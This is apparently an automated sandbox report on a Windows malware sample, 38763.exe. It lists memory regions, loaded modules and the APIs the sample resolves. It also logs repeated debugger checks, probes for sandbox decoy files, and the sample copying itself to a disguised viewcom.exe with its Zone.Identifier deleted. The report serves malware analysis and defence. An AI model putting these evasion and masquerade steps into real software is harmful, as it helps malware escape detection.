kernelbase.dll	0x758d0000	0x75919fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x75a70000	0x75b0cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x75b10000	0x75b19fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x75b60000	0x75c00fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x75c10000	0x75cd8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
urlmon.dll	0x75ce0000	0x75e15fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iertutil.dll	0x75e30000	0x7602afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x76030000	0x760cffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x760e0000	0x76136fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x76330000	0x76348fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76350000	0x76423fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x77140000	0x7715efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wininet.dll	0x771e0000	0x772d4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x772e0000	0x773abfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x773b0000	0x7745bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x77460000	0x775bbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x775c0000	0x776fbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x77710000	0x7775dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x77760000	0x777eefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x77800000	0x77800fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	Readable, Writable	Region Actions Download Dump

Host Behavior

File (2)

Operation	Filename	Additional Information	Success	Count	Logfile
Create	C:\email.doc	desired_access = GENERIC_READ		1	Fn
Create	C:\a\foobar.bmp	desired_access = GENERIC_READ		1	Fn

Process (1)

Operation	Process	Additional Information	Success	Count	Logfile
Create	C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe	os_pid = 0xb74, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE		1	Fn

Module (56)

Operation	Module	Additional Information	Count	Logfile
Load	ntdll.dll	base_address = 0x775c0000	1	Fn
Load	KERNEL32.dll	base_address = 0x76350000	2	Fn
Load	ADVAPI32.dll	base_address = 0x76030000	1	Fn
Load	SHLWAPI.dll	base_address = 0x760e0000	1	Fn
Load	winhttp.dll	base_address = 0x6f600000	7	Fn
Load	urlmon.dll	base_address = 0x75ce0000	7	Fn
Load	wininet.dll	base_address = 0x771e0000	7	Fn
Get Handle	c:\users\atveyd~1\appdata\local\temp\38763.exe	base_address = 0x400000	1	Fn
Get Filename	c:\users\atveyd~1\appdata\local\temp\38763.exe	process_name = c:\users\atveyd~1\appdata\local\temp\38763.exe, file_name_orig = C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe, size = 259	1	Fn
Get Filename		process_name = c:\users\atveyd~1\appdata\local\temp\38763.exe, file_name_orig = C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe, size = 260	1	Fn
Get Address		function = VirtualAlloc, ordinal = 0, address_out = 0x12fd10	1	Fn
Get Address		function = VirtualAlloc, ordinal = 0, address_out = 0x12fd50	1	Fn
Get Address		function = LoadLibraryA, ordinal = 0, address_out = 0x12fd6c	1	Fn
Get Address		function = GetProcAddress, ordinal = 0, address_out = 0x12fd6c	1	Fn
Get Address		function = VirtualAlloc, ordinal = 0, address_out = 0x12fd6c	1	Fn
Get Address		function = VirtualProtect, ordinal = 0, address_out = 0x12fd6c	1	Fn
Get Address		function = UnmapViewOfFile, ordinal = 0, address_out = 0x12fd6c	1	Fn
Get Address		function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x12fd6c	1	Fn
Get Address		function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x12fd6c	1	Fn
Get Address	c:\windows\system32\ntdll.dll	function = cos, address_out = 0x77607400	1	Fn
Get Address	c:\windows\system32\ntdll.dll	function = sin, address_out = 0x775f41c0	1	Fn
Get Address	c:\windows\system32\ntdll.dll	function = strchr, address_out = 0x77607690	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LoadLibraryA, address_out = 0x763a395c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = lstrcmpA, address_out = 0x76388c59	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CreateFileA, address_out = 0x7639cee8	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x7639ca7c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetModuleHandleA, address_out = 0x7639cf41	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetModuleFileNameA, address_out = 0x763a33f6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetComputerNameA, address_out = 0x76386ba9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetComputerNameExA, address_out = 0x763df41f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCommandLineA, address_out = 0x763a98ff	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = FreeConsole, address_out = 0x763fbfde	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = VirtualAlloc, address_out = 0x763a2fb6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = IsDebuggerPresent, address_out = 0x76393ea8	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetUserNameA, address_out = 0x7605a4b4	1	Fn
Get Address	c:\windows\system32\shlwapi.dll	function = StrStrIA, address_out = 0x760ed250	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = WTSGetActiveConsoleSessionId, address_out = 0x7638480b	1	Fn

System (2)

Operation	Additional Information	Success	Count	Logfile
Get Computer Name	result_out = ZJEWV7F		1	Fn
Get Computer Name	result_out = ZjEwV7f, type = ComputerNameDnsHostname		1	Fn

Mutex (1)

Operation	Additional Information	Success	Count	Logfile
Create	mutex_name = MF6003E70		1	Fn

Debug (747)

Operation	Process	Additional Information	Success	Count	Logfile
Check for Presence	c:\users\atveyd~1\appdata\local\temp\38763.exe			747	Fn

Process #4: 38763.exe

(Host: 590, Network: 0)

Information	Value
ID	#4
File Name	c:\users\atveyd~1\appdata\local\temp\38763.exe
Command Line	"C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe"
Initial Working Directory	C:\Users\ATVeyDl98Z\Desktop\
Monitor	Start Time: 00:00:57, Reason: Child Process
Unmonitor	End Time: 00:02:34, Reason: Terminated by Timeout
Monitor Duration	00:01:37

OS Process Information

Information	Value
PID	0xb74
Parent PID	0xb60 (c:\users\atveyd~1\appdata\local\temp\38763.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	ZJEWV7F\ATVeyDl98Z
Groups	ZJEWV7F\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000f73d (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x B78 0x B7C 0x B80 0x B84 0x B88

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000030000	0x00030000	0x0012ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000130000	0x00130000	0x00133fff	Pagefile Backed Memory	Readable	Region Actions
locale.nls	0x00140000	0x001a6fff	Memory Mapped File	Readable	Region Actions
private_0x00000000001b0000	0x001b0000	0x001b0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000001c0000	0x001c0000	0x001cdfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000001d0000	0x001d0000	0x001dcfff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x00000000001e0000	0x001e0000	0x001ecfff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000001f0000	0x001f0000	0x001f0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000200000	0x00200000	0x0020ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000210000	0x00210000	0x00224fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000210000	0x00210000	0x00211fff	Pagefile Backed Memory	Readable	Region Actions
windowsshell.manifest	0x00220000	0x00220fff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000000220000	0x00220000	0x00220fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000230000	0x00230000	0x00231fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000240000	0x00240000	0x00240fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000250000	0x00250000	0x0025ffff	Private Memory	Readable, Writable	Region Actions Download Dump
cversions.1.db	0x00260000	0x00263fff	Memory Mapped File	Readable	Region Actions
cversions.2.db	0x00260000	0x00263fff	Memory Mapped File	Readable	Region Actions
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db	0x00270000	0x0028ffff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000000290000	0x00290000	0x00290fff	Pagefile Backed Memory	Readable, Writable	Region Actions
cversions.2.db	0x002a0000	0x002a3fff	Memory Mapped File	Readable	Region Actions
private_0x00000000002b0000	0x002b0000	0x003affff	Private Memory	Readable, Writable	Region Actions Download Dump
{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000f.db	0x003b0000	0x003dffff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000003e0000	0x003e0000	0x003e0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x00000000003e0000	0x003e0000	0x003e6fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000003f0000	0x003f0000	0x003f1fff	Pagefile Backed Memory	Readable, Writable	Region Actions
38763.exe	0x00400000	0x00415fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000420000	0x00420000	0x004e7fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000004f0000	0x004f0000	0x005f0fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000600000	0x00600000	0x011fffff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001200000	0x01200000	0x012fffff	Private Memory	Readable, Writable	Region Actions Download Dump
sortdefault.nls	0x01300000	0x015cefff	Memory Mapped File	Readable	Region Actions
private_0x00000000015d0000	0x015d0000	0x016cffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000016d0000	0x016d0000	0x017cffff	Private Memory	Readable, Writable	Region Actions Download Dump
rpcss.dll	0x017d0000	0x0182bfff	Memory Mapped File	Readable	Region Actions
rpcss.dll	0x017d0000	0x0182bfff	Memory Mapped File	Readable	Region Actions
private_0x00000000017d0000	0x017d0000	0x0194ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x00000000017d0000	0x017d0000	0x018aefff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x00000000018b0000	0x018b0000	0x018b0fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000001910000	0x01910000	0x0194ffff	Private Memory	Readable, Writable	Region Actions Download Dump
{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db	0x01950000	0x019b5fff	Memory Mapped File	Readable	Region Actions
pagefile_0x00000000019c0000	0x019c0000	0x01db2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000001dc0000	0x01dc0000	0x01ebffff	Private Memory	Readable, Writable	Region Actions Download Dump
winspool.drv	0x6d400000	0x6d450fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
webio.dll	0x6f5b0000	0x6f5fefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winhttp.dll	0x6f600000	0x6f657fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
uxtheme.dll	0x73cf0000	0x73d2ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wtsapi32.dll	0x741a0000	0x741acfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntmarta.dll	0x74460000	0x74480fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
propsys.dll	0x745b0000	0x746a4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
comctl32.dll	0x746f0000	0x7488dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
userenv.dll	0x74dc0000	0x74dd6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x751e0000	0x751f5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x75640000	0x7565afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x75660000	0x7566bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
profapi.dll	0x75710000	0x7571afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msasn1.dll	0x75780000	0x7578bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
devobj.dll	0x75790000	0x757a1fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
crypt32.dll	0x757b0000	0x758ccfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x758d0000	0x75919fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cfgmgr32.dll	0x759b0000	0x759d6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x75a70000	0x75b0cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x75b10000	0x75b19fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x75b60000	0x75c00fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x75c10000	0x75cd8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
urlmon.dll	0x75ce0000	0x75e15fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iertutil.dll	0x75e30000	0x7602afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x76030000	0x760cffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x760e0000	0x76136fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wldap32.dll	0x76140000	0x76184fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
setupapi.dll	0x76190000	0x7632cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x76330000	0x76348fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x76350000	0x76423fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
clbcatq.dll	0x76460000	0x764e2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x764f0000	0x77139fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x77140000	0x7715efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wininet.dll	0x771e0000	0x772d4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x772e0000	0x773abfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x773b0000	0x7745bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x77460000	0x775bbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x775c0000	0x776fbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x77710000	0x7775dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x77760000	0x777eefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
apisetschema.dll	0x77800000	0x77800fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007f6f0000	0x7f6f0000	0x7f7effff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x000000007ffb0000	0x7ffb0000	0x7ffd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007ffda000	0x7ffda000	0x7ffdafff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdb000	0x7ffdb000	0x7ffdbfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdc000	0x7ffdc000	0x7ffdcfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdd000	0x7ffdd000	0x7ffddfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffde000	0x7ffde000	0x7ffdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007ffdf000	0x7ffdf000	0x7ffdffff	Private Memory	Readable, Writable	Region Actions Download Dump

Created Files

Filename	File Size	Hash Values	YARA Match	Actions
c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe	84.00 KB (86016 bytes)	MD5: 1b1e6729790854252dfba6c77f198a4e SHA1: 327c94b435802f77d12913956b28c70d00ab2de5 SHA256: 3939227998b7986b481eb9bc1a10dd1c5c02fc7ff9edbd25ad86a61307186d98		File Actions Show Properties Download

Host Behavior

File (13)

Operation	Filename	Additional Information	Count	Logfile
Create	C:\email.doc	desired_access = GENERIC_READ	1	Fn
Create	C:\a\foobar.bmp	desired_access = GENERIC_READ	1	Fn
Create	C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Get Info	C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe	type = size	1	Fn
Get Info	C:\	type = file_attributes	1	Fn
Get Info	C:\Users\	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\	type = file_attributes	1	Fn
Get Info	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\	type = file_attributes	1	Fn
Move	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe	source_filename = C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe	1	Fn
Delete	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe:Zone.Identifier		1	Fn

Process (1)

Operation	Process	Additional Information	Success	Count	Logfile
Create	C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe	os_pid = 0xb8c, startup_flags = STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE		1	Fn

Module (67)

Operation	Module	Additional Information	Count	Logfile
Load	ntdll.dll	base_address = 0x775c0000	1	Fn
Load	KERNEL32.dll	base_address = 0x76350000	2	Fn
Load	ADVAPI32.dll	base_address = 0x76030000	1	Fn
Load	SHLWAPI.dll	base_address = 0x760e0000	1	Fn
Load	winhttp.dll	base_address = 0x6f600000	7	Fn
Load	urlmon.dll	base_address = 0x75ce0000	8	Fn
Load	wininet.dll	base_address = 0x771e0000	8	Fn
Load	advapi32.dll	base_address = 0x76030000	1	Fn
Load	ole32.dll	base_address = 0x77460000	1	Fn
Load	shell32.dll	base_address = 0x764f0000	1	Fn
Load	crypt32.dll	base_address = 0x757b0000	1	Fn
Load	userenv.dll	base_address = 0x74dc0000	1	Fn
Load	wtsapi32.dll	base_address = 0x741a0000	1	Fn
Get Handle	c:\users\atveyd~1\appdata\local\temp\38763.exe	base_address = 0x400000	1	Fn
Get Filename	c:\users\atveyd~1\appdata\local\temp\38763.exe	process_name = c:\users\atveyd~1\appdata\local\temp\38763.exe, file_name_orig = C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe, size = 259	1	Fn
Get Filename		process_name = c:\users\atveyd~1\appdata\local\temp\38763.exe, file_name_orig = C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe, size = 260	2	Fn
Get Address		function = VirtualAlloc, ordinal = 0, address_out = 0x12fd10	1	Fn
Get Address		function = VirtualAlloc, ordinal = 0, address_out = 0x12fd50	1	Fn
Get Address		function = LoadLibraryA, ordinal = 0, address_out = 0x12fd6c	1	Fn
Get Address		function = GetProcAddress, ordinal = 0, address_out = 0x12fd6c	1	Fn
Get Address		function = VirtualAlloc, ordinal = 0, address_out = 0x12fd6c	1	Fn
Get Address		function = VirtualProtect, ordinal = 0, address_out = 0x12fd6c	1	Fn
Get Address		function = UnmapViewOfFile, ordinal = 0, address_out = 0x12fd6c	1	Fn
Get Address		function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x12fd6c	1	Fn
Get Address		function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x12fd6c	1	Fn
Get Address	c:\windows\system32\ntdll.dll	function = cos, address_out = 0x77607400	1	Fn
Get Address	c:\windows\system32\ntdll.dll	function = sin, address_out = 0x775f41c0	1	Fn
Get Address	c:\windows\system32\ntdll.dll	function = strchr, address_out = 0x77607690	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = LoadLibraryA, address_out = 0x763a395c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = lstrcmpA, address_out = 0x76388c59	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CreateFileA, address_out = 0x7639cee8	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = CloseHandle, address_out = 0x7639ca7c	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetModuleHandleA, address_out = 0x7639cf41	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetModuleFileNameA, address_out = 0x763a33f6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetComputerNameA, address_out = 0x76386ba9	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetComputerNameExA, address_out = 0x763df41f	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = GetCommandLineA, address_out = 0x763a98ff	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = FreeConsole, address_out = 0x763fbfde	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = VirtualAlloc, address_out = 0x763a2fb6	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = IsDebuggerPresent, address_out = 0x76393ea8	1	Fn
Get Address	c:\windows\system32\advapi32.dll	function = GetUserNameA, address_out = 0x7605a4b4	1	Fn
Get Address	c:\windows\system32\shlwapi.dll	function = StrStrIA, address_out = 0x760ed250	1	Fn
Get Address	c:\windows\system32\kernel32.dll	function = WTSGetActiveConsoleSessionId, address_out = 0x7638480b	1	Fn
Create Mapping	C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe	filename = C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Map	C:\Users\ATVEYD~1\AppData\Local\Temp\38763.exe	process_name = c:\users\atveyd~1\appdata\local\temp\38763.exe, desired_access = FILE_MAP_READ	1	Fn

Service (1)

Operation	Additional Information	Success	Count	Logfile
Open Manager	database_name = SERVICES_ACTIVE_DATABASE		1	Fn

System (4)

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = ZJEWV7F	2	Fn
Get Computer Name	result_out = ZjEwV7f, type = ComputerNameDnsHostname	1	Fn
Get Info	type = Windows Directory, result_out = C:\Windows	1	Fn

Mutex (4)

Operation	Additional Information	Count	Logfile
Create	mutex_name = MF6003E70	1	Fn
Create	mutex_name = Global\I40F77A1B	1	Fn
Create	mutex_name = Global\M40F77A1B	1	Fn
Release	mutex_name = Global\I40F77A1B	1	Fn

Debug (498)

Operation	Process	Additional Information	Success	Count	Logfile
Check for Presence	c:\users\atveyd~1\appdata\local\temp\38763.exe			498	Fn

Process #5: viewcom.exe

(Host: 561, Network: 0)

Information	Value
ID	#5
File Name	c:\users\atveydl98z\appdata\local\microsoft\windows\viewcom.exe
Command Line	"C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\viewcom.exe"
Initial Working Directory	C:\Users\ATVeyDl98Z\Desktop\
Monitor	Start Time: 00:01:01, Reason: Child Process
Unmonitor	End Time: 00:02:34, Reason: Terminated by Timeout
Monitor Duration	00:01:33

OS Process Information

Information	Value
PID	0xb8c
Parent PID	0xb74 (c:\users\atveyd~1\appdata\local\temp\38763.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	ZJEWV7F\ATVeyDl98Z
Groups	ZJEWV7F\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0000f73d (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x B90 0x B94

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000030000	0x00030000	0x0012ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000130000	0x00130000	0x00133fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000140000	0x00140000	0x00140fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000150000	0x00150000	0x0015dfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000160000	0x00160000	0x0016cfff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000000170000	0x00170000	0x0017cfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000001a0000	0x001a0000	0x0029ffff	Private Memory	Readable, Writable	Region Actions Download Dump
locale.nls	0x002a0000	0x00306fff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000000310000	0x00310000	0x003d7fff	Pagefile Backed Memory	Readable	Region Actions
38763.exe	0x00400000	0x00415fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x0000000000420000	0x00420000	0x00520fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000580000	0x00580000	0x0058ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000590000	0x00590000	0x0118ffff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000011f0000	0x011f0000	0x011fffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000001200000	0x01200000	0x012fffff	Private Memory	Readable, Writable	Region Actions Download Dump
sortdefault.nls	0x01300000	0x015cefff	Memory Mapped File	Readable	Region Actions
winspool.drv	0x6d400000	0x6d450fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
webio.dll	0x6f5b0000	0x6f5fefff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winhttp.dll	0x6f600000	0x6f657fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x75640000	0x7565afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msasn1.dll	0x75780000	0x7578bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
crypt32.dll	0x757b0000	0x758ccfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x758d0000	0x75919fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x75a70000	0x75b0cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x75b10000	0x75b19fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
